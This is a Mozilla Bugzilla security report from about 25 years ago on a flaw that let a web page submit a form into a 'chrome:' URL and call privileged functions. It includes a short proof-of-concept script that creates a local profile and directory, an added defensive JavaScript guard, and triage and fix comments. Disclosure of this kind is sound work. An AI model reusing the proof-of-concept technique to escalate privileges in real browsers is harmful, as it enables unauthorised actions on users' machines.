Closed
Bug 21144
Opened 25 years ago
Closed 25 years ago
[DOGFOOD] Executing JS functions in "chrome:" protocol (creating local directories and profiles)
Categories
(Core :: Security, defect, P3)
VERIFIED FIXED
M12
People
(Reporter: joro, Assigned: norrisboyd)
Details
(Whiteboard: [PDT-]reviewed fix in hand)
There is a vulnerability which allows executing JavaScript functions in the "chrome:" protocol. This is dangerous because such functions have many more privileges than JavaScript functions loaded from a web page. If one opens a "chrome:" URL in a window, he has access to all functions in the window, and the functions are executed by "windowname.functionname()" in the "chrome:" protocol. Some of the predefined functions in the Mozilla chrome may do dangerous things. This demonstration creates a profile named "georgi" and creates the directory "c:\georgi". The code is:
-------------------------------------------------------------------------
<SCRIPT>
b=window.open("","victim");
function g()
{
b.profile.createNewProfile("georgi","c:\\georgi\\");
}
setTimeout("document.forms[0].submit()",1000);
setTimeout("g()",4000);
</SCRIPT>
<FORM ACTION="chrome://profile/content/createProfileWizard.xul" TARGET="victim" METHOD="POST">
</FORM>
-------------------------------------------------------------------------
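As an added illustration, not code from the bug report or from Mozilla's fix in nsFormFrame.cpp, here is a submission-target guard written in JavaScript: a web-content document must not be able to POST a form into a "chrome:" URL, while a chrome document keeps its own freedom. The document URLs and the allow/deny policy are assumptions; the chrome: action URL is the one from the report.

```javascript
// Added example, not the nsFormFrame.cpp fix itself: a submission-target guard
// that refuses to let web content POST a form into the privileged chrome: scheme.
// Policy assumption: only chrome: is privileged, and a privileged (chrome:)
// document may submit anywhere.
const PRIVILEGED_SCHEMES = new Set(["chrome:"]);

// Resolve a form's ACTION the way a browser would: relative to the submitting
// document's URL. Returns null when the result is not a parseable URL.
function resolveAction(action, documentUrl) {
  try {
    return new URL(action, documentUrl);
  } catch {
    return null;
  }
}

// Decide whether a submission from `documentUrl` to `action` may proceed.
// The scheme is compared on the parsed URL, so "CHROME://..." and
// "  chrome://..." (leading whitespace) are normalised before the check.
function isSubmissionAllowed(documentUrl, action) {
  const submitter = new URL(documentUrl);
  const target = resolveAction(action, submitter);
  if (target === null) return false;                           // unparseable: refuse
  if (PRIVILEGED_SCHEMES.has(submitter.protocol)) return true; // chrome UI itself
  return !PRIVILEGED_SCHEMES.has(target.protocol);             // content stays unprivileged
}

// Constructed inputs: the ACTION from the report, submitted from an ordinary web page.
const CONTENT_PAGE = "http://content.example/page.html";
const WIZARD = "chrome://profile/content/createProfileWizard.xul";

console.log(isSubmissionAllowed(CONTENT_PAGE, WIZARD));    // false: blocked
console.log(isSubmissionAllowed(CONTENT_PAGE, "/submit"));  // true
console.log(isSubmissionAllowed(WIZARD, "finish.xul"));     // true: chrome to chrome
```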
Updated•25 years ago
Status: NEW → ASSIGNED
Summary: Executing JS functions in "chrome:" protocol (creating local directories and profiles) → [DOGFOOD] Executing JS functions in "chrome:" protocol (creating local directories and profiles)
Comment 1•25 years ago
Marking dogfood for PDT consideration.
Comment 2•25 years ago
Jim Roskind asked:
>Can you make some comments about this bug? Can the content arrive from
>outside, or is it restricted to stuff on the local
>disk? Is there any obvious attackable script sitting locally?
This bug allows access to all functions defined in chrome. This is the
equivalent of a Java applet being able to call all methods of all classes in the
system. We haven't reviewed the whole of the JavaScript defined in chrome since
the model is to prevent access to all of it, but I would be very surprised if
there weren't many opportunities for exploitation.
Updated•25 years ago
Whiteboard: reviewed fix in hand
Whiteboard: reviewed fix in hand → [PDT-]reviewed fix in hand
Target Milestone: M12
Comment 3•25 years ago
Putting on PDT- radar. But it is good for M12... please see chofmann for approval to check in.
Updated•25 years ago
Status: ASSIGNED → RESOLVED
Closed: 25 years ago
Resolution: --- → FIXED
Comment 4•25 years ago
Fixed:
Checking in nsFormFrame.cpp;
/m/pub/mozilla/layout/html/forms/src/nsFormFrame.cpp,v  <--  nsFormFrame.cpp
new revision: 3.86; previous revision: 3.85
done
Updated•25 years ago
Status: RESOLVED → VERIFIED
Comment 5•25 years ago
Verified fixed.
Bulk moving all Browser Security bugs to new Security: General component. The previous Security component for Browser will be deleted.
Component: Security → Security: General